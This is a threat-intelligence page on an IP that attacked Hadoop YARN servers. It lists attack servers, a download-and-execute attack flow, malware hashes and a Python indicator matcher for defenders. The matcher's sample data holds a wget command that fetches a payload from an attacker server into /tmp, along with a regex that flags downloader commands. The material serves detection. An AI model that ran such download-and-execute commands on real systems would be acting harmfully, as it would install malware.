IP Address: 80.211.173.234 (Previously Malicious)


IP Address:
80.211.173.234
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP, HadoopYARN, Malicious File, IDS - Web Application Attack, Outgoing Connection, Download and Allow Execution, Download and Execute, Download File, Inbound HTTP Request

Associated Attack Servers

aruba.it

80.211.69.84 104.40.157.159 52.170.223.233 40.117.44.182 104.46.40.157 13.92.114.106 52.179.23.37 52.174.33.6 13.94.200.48 23.101.129.153 52.233.141.180 40.121.136.37 40.68.86.94 52.178.117.234 13.90.253.5 52.168.150.12 52.233.137.26 13.93.0.140 40.117.238.114 40.68.31.228 13.73.166.169 13.73.167.164 13.81.222.239 40.85.190.216 13.95.80.40 52.179.16.86 80.211.66.35 52.168.135.53 40.68.42.232 13.69.28.221

Basic Information

IP Address

80.211.173.234

Domain

-

ISP

Aruba S.p.A.

Country

Italy

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-09-30

Last seen in Guardicore Centra

2018-10-07

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

Outgoing Connection: process /usr/bin/wget generated outgoing network traffic to 80.211.66.35:80

Download and Allow Execution: the file /tmp/mysql.sock.lock was downloaded and granted execution privileges

Outgoing Connection: process /tmp/feds generated outgoing network traffic to 80.211.66.35:69 (port 69 is the TFTP port, so the dropped binary fetched a further stage over a second channel)

Download and Execute: the file /tmp/feds was downloaded and executed 4 times

IDS - Web Application Attack: IDS detected Web Application Attack: 401TRG Generic Webshell Request - POST with wget in body

Connection was closed due to user inactivity

Malicious File: /tmp/feds was identified as malicious by YARA according to rules: 000 Common Rules

Associated Files

Path             Size (bytes)  SHA256
/tmp/feds        111115        a0d61a671e5f3fc32552b4934b56874f7207c19a7bf38b41e520cfbd795d3d50
/tmp/feds        48861         acc9e920deb06ef49605068965b65db42fd0554f1f50769de6957e34a1e82927
/tmp/yakuza.x86  111115        cc1e5af5ac9e134c29b61d95d523e296837de7f80140e27df13840172615c950
/tmp/yakuza.x86  111115        740403aae097ee11b4fc43e03bc5448c742803e35672b2131e038a7a05c73899
/tmp/feds        111115        61ece7b92b136267027b7fd2cc251cefe51c3aafc171a9d17d772d99cbfb653a
/tmp/feds        75421         ee9d62dc3b359bcc035b7d64ef4651eb8f69577e35a87968591c5ee9a1cfc380
/tmp/feds        11677         ecc407b433351cff5a9e077f503384f6878fdaf2d18c8f424ae778a0ab57de60
/tmp/feds        111115        dc208ef8a2b3b306b18e0f5b068b3eed4da7b1f37d8b79bb71db42c23632502a

Five of the eight samples are exactly 111115 bytes yet hash differently, so a hash-only blocklist will miss sibling builds; match on the drop paths and the attack-server addresses as well.
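The attack flow and the file list above give enough indicators to build a simple host and network IOC matcher. The following Python is an added example written for this page, not Guardicore's or Centra's code: it copies the attack-server addresses, drop paths and SHA256 values from this page and runs a few rules over constructed telemetry events that stand in for EDR process, file and proxy records. The HTTP rule mirrors the named IDS signature, a POST whose body invokes wget; treating curl the same way, and the request path /ws/v1/cluster/apps (the YARN ResourceManager REST endpoint for application submission, which the page does not name), are assumptions.

```python
"""Host and network IOC matcher built from the indicators on this page.

Added example, not Guardicore or Centra code. Attack-server addresses,
drop paths and SHA256 values are copied from the page; the telemetry
events below are constructed stand-ins for EDR and proxy records.
"""
import hashlib
import re

# Indicators copied from this page.
ATTACK_SERVERS = {"80.211.173.234", "80.211.66.35", "80.211.69.84"}
DROP_PATHS = {"/tmp/feds", "/tmp/yakuza.x86", "/tmp/mysql.sock.lock"}
MALICIOUS_SHA256 = {
    "a0d61a671e5f3fc32552b4934b56874f7207c19a7bf38b41e520cfbd795d3d50",
    "acc9e920deb06ef49605068965b65db42fd0554f1f50769de6957e34a1e82927",
    "cc1e5af5ac9e134c29b61d95d523e296837de7f80140e27df13840172615c950",
    "740403aae097ee11b4fc43e03bc5448c742803e35672b2131e038a7a05c73899",
    "61ece7b92b136267027b7fd2cc251cefe51c3aafc171a9d17d772d99cbfb653a",
    "ee9d62dc3b359bcc035b7d64ef4651eb8f69577e35a87968591c5ee9a1cfc380",
    "ecc407b433351cff5a9e077f503384f6878fdaf2d18c8f424ae778a0ab57de60",
    "dc208ef8a2b3b306b18e0f5b068b3eed4da7b1f37d8b79bb71db42c23632502a",
}
# Mirrors the IDS signature in the attack flow ("POST with wget in body").
# Matching curl as well is an assumption, not something the page states.
DOWNLOADER_IN_BODY = re.compile(r"\b(wget|curl)\s+\S+", re.IGNORECASE)


def sha256_hex(blob: bytes) -> str:
    """Hex SHA256 of a byte string, the form in which the page lists hashes."""
    return hashlib.sha256(blob).hexdigest()


def match_event(ev: dict) -> list:
    """Return the findings for one telemetry event (empty list if clean)."""
    hits = []
    if ev["kind"] == "connect":
        if ev["dst_ip"] in ATTACK_SERVERS:
            hits.append(f"{ev['process']} connected to attack server "
                        f"{ev['dst_ip']}:{ev['dst_port']}")
        if ev["dst_port"] == 69 and ev["process"].startswith("/tmp/"):
            # The flow above shows /tmp/feds reaching port 69, the TFTP port:
            # a dropper in /tmp fetching a further stage.
            hits.append(f"{ev['process']} used port 69 (TFTP) to {ev['dst_ip']}")
    elif ev["kind"] == "file":
        if ev["sha256"] in MALICIOUS_SHA256:
            hits.append(f"{ev['path']} matches a listed malicious SHA256")
        if ev["path"] in DROP_PATHS and ev.get("executable"):
            hits.append(f"{ev['path']} is a listed drop path and is executable")
    elif ev["kind"] == "http":
        if ev["method"] == "POST" and DOWNLOADER_IN_BODY.search(ev["body"]):
            hits.append(f"POST to {ev['path']} carries a download command")
    return hits


def scan(events: list) -> dict:
    """Map event index -> findings for every event that matched a rule."""
    report = {}
    for i, ev in enumerate(events):
        hits = match_event(ev)
        if hits:
            report[i] = hits
    return report


# Constructed sample telemetry following the attack flow on this page.
# The YARN REST path /ws/v1/cluster/apps is assumed; the page does not
# name the endpoint the IDS saw.
SAMPLE_EVENTS = [
    {"kind": "http", "method": "POST", "path": "/ws/v1/cluster/apps",
     "body": '{"command": "wget http://80.211.66.35/feds -O /tmp/feds"}'},
    {"kind": "connect", "process": "/usr/bin/wget",
     "dst_ip": "80.211.66.35", "dst_port": 80},
    {"kind": "file", "path": "/tmp/feds", "executable": True,
     "sha256": "a0d61a671e5f3fc32552b4934b56874f7207c19a7bf38b41e520cfbd795d3d50"},
    {"kind": "connect", "process": "/tmp/feds",
     "dst_ip": "80.211.66.35", "dst_port": 69},
    {"kind": "file", "path": "/tmp/notes.txt", "executable": False,
     "sha256": sha256_hex(b"harmless constructed content")},
    {"kind": "connect", "process": "/usr/bin/apt-get",
     "dst_ip": "93.184.216.34", "dst_port": 443},
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        for finding in findings:
            print(f"event {idx}: {finding}")
```

Run as a script it reports the first four constructed events and stays silent on the two benign ones. The rules are deliberately layered: the hash set catches the exact samples listed here, the path and port rules catch the same tradecraft when the binary is rebuilt, and the POST-body rule fires on the initial request before anything is written to disk.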

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.
